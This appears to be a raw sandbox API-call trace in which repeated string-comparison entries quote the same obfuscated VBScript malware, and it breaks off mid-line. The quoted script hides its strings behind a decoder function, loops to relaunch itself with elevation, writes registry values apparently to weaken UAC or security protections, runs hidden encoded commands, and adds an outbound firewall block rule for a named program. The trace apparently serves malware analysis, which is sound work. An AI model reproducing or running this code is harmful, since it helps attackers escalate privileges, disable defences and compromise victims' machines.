CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 72 [0226.330] wcsncmp (_String1="T = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 71 [0226.330] wcsncmp (_String1=" = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.330] wcsncmp (_String1="= 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0226.330] wcsncmp (_String1=" 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.330] wcsncmp (_String1="2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite 